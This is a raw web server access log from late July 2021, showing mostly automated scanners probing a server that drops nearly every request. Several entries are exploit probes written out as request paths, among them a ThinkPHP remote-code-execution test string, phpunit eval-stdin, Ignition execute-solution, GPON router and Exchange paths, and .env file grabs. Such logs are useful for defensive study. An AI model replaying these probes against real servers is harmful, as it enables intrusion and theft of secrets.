[Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [26/Jul/2021:13:50:10 +0000] 444 - GET https 64.22.21.87 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [26/Jul/2021:13:50:12 +0000] 444 - GET https 64.22.21.87 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [26/Jul/2021:13:50:12 +0000] 444 - POST https 64.22.21.87 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.21.87:443" [26/Jul/2021:13:50:13 +0000] 444 - GET https 64.22.21.87 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [26/Jul/2021:13:50:15 +0000] 444 - GET https 64.22.21.87 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [26/Jul/2021:13:50:15 +0000] 444 - POST https 64.22.21.87 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [26/Jul/2021:13:50:17 +0000] 444 - GET https 64.22.21.87 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [26/Jul/2021:13:50:17 +0000] 444 - GET https 64.22.21.87 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [26/Jul/2021:15:10:19 +0000] 444 - GET https 64.22.21.87 "/" [Client 192.241.207.101] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [26/Jul/2021:15:28:15 +0000] 444 - GET https 64.22.21.87 "/owa/auth/logon.aspx" [Client 100.20.65.98] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36" "-" [26/Jul/2021:15:29:07 +0000] 444 - GET https 64.22.21.87 "/" [Client 128.14.133.58] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [26/Jul/2021:17:36:27 +0000] 444 - GET https lndshark.moralanimal.net "/" [Client 92.118.160.41] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [26/Jul/2021:19:04:51 +0000] 444 - GET https 64.22.21.87 "/console/login/LoginForm.jsp" [Client 194.48.199.78] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36" "-" [26/Jul/2021:19:50:45 +0000] 444 - GET https 64.22.21.87 "/" [Client 71.6.232.7] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36" "-" [26/Jul/2021:20:42:28 +0000] 444 - GET https 64.22.21.87 "/" [Client 80.82.77.192] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" [26/Jul/2021:20:45:46 +0000] 400 - GET http 64.22.21.87 "/" [Client 80.82.77.192] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [26/Jul/2021:21:02:59 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [26/Jul/2021:21:02:59 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [26/Jul/2021:21:02:59 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [26/Jul/2021:21:02:59 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [26/Jul/2021:21:02:59 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [26/Jul/2021:21:02:59 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [26/Jul/2021:22:50:21 +0000] 444 - GET https 64.22.21.87 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.218.116] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [26/Jul/2021:23:11:56 +0000] 444 - GET https 64.22.21.87 "/" [Client 162.221.192.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [27/Jul/2021:00:16:14 +0000] 444 - GET https 64.22.21.87 "/" [Client 184.105.247.195] [Length 0] [Gzip -] "-" "-" [27/Jul/2021:00:50:19 +0000] 444 - GET https 64.22.21.87 "/" [Client 54.145.59.146] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/52.0.3009.58 Safari/537.32" "-" [27/Jul/2021:00:50:19 +0000] 444 - GET https 64.22.21.87 "/" [Client 54.145.59.146] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/52.0.3009.58 Safari/537.32" "-" [27/Jul/2021:01:28:59 +0000] 444 - GET https 64.22.21.87 "/" [Client 128.14.141.34] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [27/Jul/2021:01:47:32 +0000] 444 - GET https smtp.moralanimal.net "/" [Client 124.126.78.170] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; U; Android 9; zh-cn; RMX1901 Build/QKQ1.190918.001) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/70.0.3538.80 Mobile Safari/537.36 HeyTapBrowser/40.7.22.1" "-" [27/Jul/2021:02:18:42 +0000] 444 - POST https 64.22.21.87 "/t3" [Client 46.138.249.126] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko" "-" [27/Jul/2021:02:36:47 +0000] 444 - GET https 64.22.21.87 "/actuator/health" [Client 192.241.210.239] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [27/Jul/2021:05:25:56 +0000] 400 - GET http localhost "/" [Client 185.189.182.234] [Length 154] [Gzip -] "-" "-" [27/Jul/2021:06:08:43 +0000] 444 - POST https 64.22.21.87 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Jul/2021:06:08:43 +0000] 444 - POST https 64.22.21.87 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Jul/2021:06:08:45 +0000] 444 - GET https 64.22.21.87 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Jul/2021:06:08:45 +0000] 444 - GET https 64.22.21.87 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Jul/2021:06:08:46 +0000] 444 - GET https 64.22.21.87 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Jul/2021:06:08:46 +0000] 444 - GET https 64.22.21.87 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Jul/2021:06:08:47 +0000] 444 - POST https 64.22.21.87 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.21.87:443" [27/Jul/2021:06:08:47 +0000] 444 - GET https 64.22.21.87 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Jul/2021:06:08:48 +0000] 444 - GET https 64.22.21.87 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Jul/2021:06:08:48 +0000] 444 - POST https 64.22.21.87 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Jul/2021:06:08:49 +0000] 444 - GET https 64.22.21.87 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Jul/2021:08:54:31 +0000] 444 - GET https 64.22.21.87 "/cgi-bin/config.exp" [Client 128.14.133.58] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [27/Jul/2021:09:13:42 +0000] 444 - OPTIONS https 64.22.21.87 "/" [Client 34.65.51.79] [Length 0] [Gzip -] "-" "-" [27/Jul/2021:09:46:36 +0000] 444 - GET https 64.22.21.87 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.209.114] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [27/Jul/2021:11:35:10 +0000] 444 - GET https 64.22.21.87 "/" [Client 192.35.168.32] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [27/Jul/2021:13:22:46 +0000] 444 - GET https 64.22.21.87 "/.env" [Client 37.229.198.180] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" "-" [27/Jul/2021:14:01:38 +0000] 444 - GET https 64.22.21.87 "/" [Client 183.136.225.14] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [27/Jul/2021:15:13:55 +0000] 444 - GET https 64.22.21.87 "/" [Client 192.241.203.131] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [27/Jul/2021:16:45:03 +0000] 444 - GET https 64.22.21.87 "/login" [Client 194.48.199.78] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36" "-" [27/Jul/2021:17:51:49 +0000] 444 - GET https 64.22.21.87 "/" [Client 128.14.134.134] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [27/Jul/2021:18:37:12 +0000] 400 - - http localhost "-" [Client 185.202.2.147] [Length 154] [Gzip -] "-" "-" [27/Jul/2021:21:11:21 +0000] 444 - GET https 64.22.21.87 "/ReportServer" [Client 192.241.196.178] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [27/Jul/2021:21:51:25 +0000] 444 - GET https 64.22.21.87 "/login" [Client 192.241.209.12] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [27/Jul/2021:22:47:26 +0000] 444 - GET https 64.22.21.87 "/" [Client 183.136.225.14] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [27/Jul/2021:22:50:29 +0000] 444 - GET https 64.22.21.87 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.198.59] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [27/Jul/2021:22:55:43 +0000] 444 - GET https 64.22.21.87 "/" [Client 193.118.53.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [28/Jul/2021:00:22:16 +0000] 400 - - http localhost "-" [Client 89.248.165.120] [Length 154] [Gzip -] "-" "-" [28/Jul/2021:00:36:13 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 192.227.134.79] [Length 0] [Gzip -] "curl/7.3.2" "-" [28/Jul/2021:00:44:36 +0000] 444 - GET https 64.22.21.87 "/" [Client 64.62.197.152] [Length 0] [Gzip -] "-" "-" [28/Jul/2021:00:46:55 +0000] 444 - GET https 64.22.21.87 "/Telerik.Web.UI.WebResource.axd?type=rau" [Client 23.251.102.74] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [28/Jul/2021:01:10:01 +0000] 400 - - http localhost "-" [Client 91.220.163.137] [Length 154] [Gzip -] "-" "-" [28/Jul/2021:02:07:14 +0000] 444 - GET https 64.22.21.87 "/" [Client 104.206.128.14] [Length 0] [Gzip -] "https://gdnplus.com:Gather Analyze Provide." "-" [28/Jul/2021:02:34:59 +0000] 444 - GET https 64.22.21.87 "/" [Client 34.79.107.251] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [28/Jul/2021:03:27:41 +0000] 444 - GET https 64.22.21.87 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Jul/2021:03:27:42 +0000] 444 - GET https 64.22.21.87 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Jul/2021:03:27:44 +0000] 444 - POST https 64.22.21.87 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.21.87:443" [28/Jul/2021:03:27:46 +0000] 444 - GET https 64.22.21.87 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Jul/2021:03:27:48 +0000] 444 - GET https 64.22.21.87 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Jul/2021:03:27:49 +0000] 444 - GET https 64.22.21.87 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Jul/2021:03:27:50 +0000] 444 - POST https 64.22.21.87 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Jul/2021:03:27:50 +0000] 444 - GET https 64.22.21.87 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Jul/2021:03:27:52 +0000] 444 - GET https 64.22.21.87 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Jul/2021:03:27:53 +0000] 444 - POST https 64.22.21.87 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Jul/2021:03:28:43 +0000] 444 - GET https 64.22.21.87 "/" [Client 45.79.204.46] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [28/Jul/2021:04:07:25 +0000] 400 - - http localhost "-" [Client 91.220.163.137] [Length 154] [Gzip -] "-" "-" [28/Jul/2021:04:19:01 +0000] 444 - GET https 64.22.21.87 "/actuator/health" [Client 192.241.219.60] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [28/Jul/2021:05:25:38 +0000] 444 - GET https 64.22.21.87 "/" [Client 167.248.133.38] [Length 0] [Gzip -] "-" "-" [28/Jul/2021:05:25:39 +0000] 400 - GET http 64.22.21.87 "/" [Client 167.248.133.38] [Length 252] [Gzip -] "-" "-" [28/Jul/2021:05:25:39 +0000] 400 - GET http 64.22.21.87 "/" [Client 167.248.133.38] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [28/Jul/2021:06:25:01 +0000] 444 - GET https 64.22.21.87 "/" [Client 74.120.14.40] [Length 0] [Gzip -] "-" "-" [28/Jul/2021:06:25:03 +0000] 400 - GET http 64.22.21.87 "/" [Client 74.120.14.40] [Length 252] [Gzip -] "-" "-" [28/Jul/2021:06:25:03 +0000] 400 - GET http 64.22.21.87 "/" [Client 74.120.14.40] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [28/Jul/2021:06:50:16 +0000] 444 - GET https 64.22.21.87 "/remote/login" [Client 23.251.102.74] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [28/Jul/2021:06:56:55 +0000] 444 - GET https 64.22.21.87 "/.env" [Client 34.70.33.129] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [28/Jul/2021:07:26:44 +0000] 444 - GET https 64.22.21.87 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0" "-" [28/Jul/2021:08:18:27 +0000] 444 - GET https 64.22.21.87 "/" [Client 128.1.248.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [28/Jul/2021:08:26:19 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 192.227.134.73] [Length 0] [Gzip -] "curl/7.3.2" "-" [28/Jul/2021:09:49:39 +0000] 444 - GET https 64.22.21.87 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.219.61] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [28/Jul/2021:10:23:49 +0000] 444 - GET https 64.22.21.87 "/bag2" [Client 139.162.145.250] [Length 0] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)" "-" [28/Jul/2021:12:24:12 +0000] 444 - GET https 64.22.21.87 "/" [Client 27.115.124.75] [Length 0] [Gzip -] "-" "-" [28/Jul/2021:12:24:13 +0000] 400 - - https localhost "-" [Client 27.115.124.75] [Length 154] [Gzip -] "-" "-" [28/Jul/2021:12:24:14 +0000] 400 - - http localhost "-" [Client 27.115.124.99] [Length 154] [Gzip -] "-" "-" [28/Jul/2021:12:24:24 +0000] 400 - - https localhost "-" [Client 27.115.124.36] [Length 0] [Gzip -] "-" "-" [28/Jul/2021:12:24:25 +0000] 444 - GET https 64.22.21.87 "/favicon.ico" [Client 27.115.124.37] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [28/Jul/2021:12:24:25 +0000] 444 - GET https 64.22.21.87 "/robots.txt" [Client 27.115.124.74] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [28/Jul/2021:12:24:26 +0000] 444 - GET https 64.22.21.87 "/sitemap.xml" [Client 27.115.124.75] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [28/Jul/2021:14:33:00 +0000] 444 - GET https 64.22.21.87 "/" [Client 162.221.192.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [28/Jul/2021:15:02:17 +0000] 444 - GET https 64.22.21.87 "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [28/Jul/2021:15:02:17 +0000] 444 - GET https 64.22.21.87 "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [28/Jul/2021:15:50:53 +0000] 444 - GET https 64.22.21.87 "/" [Client 192.241.219.37] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [28/Jul/2021:17:31:28 +0000] 444 - OPTIONS https 64.22.21.87 "/" [Client 171.25.193.78] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36" "-" [28/Jul/2021:18:47:33 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [28/Jul/2021:19:44:55 +0000] 444 - GET https 64.22.21.87 "/" [Client 193.118.53.194] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [28/Jul/2021:20:41:44 +0000] 444 - GET https 64.22.21.87 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Jul/2021:20:41:44 +0000] 444 - GET https 64.22.21.87 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Jul/2021:20:41:44 +0000] 444 - POST https 64.22.21.87 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Jul/2021:20:41:45 +0000] 444 - GET https 64.22.21.87 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Jul/2021:20:41:45 +0000] 444 - GET https 64.22.21.87 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Jul/2021:20:41:47 +0000] 444 - GET https 64.22.21.87 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Jul/2021:20:41:47 +0000] 444 - POST https 64.22.21.87 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Jul/2021:20:41:49 +0000] 444 - POST https 64.22.21.87 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.21.87:443" [28/Jul/2021:20:41:50 +0000] 444 - GET https 64.22.21.87 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Jul/2021:20:41:50 +0000] 444 - GET https 64.22.21.87 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Jul/2021:20:41:50 +0000] 444 - POST https 64.22.21.87 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Jul/2021:22:51:20 +0000] 444 - GET https 64.22.21.87 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 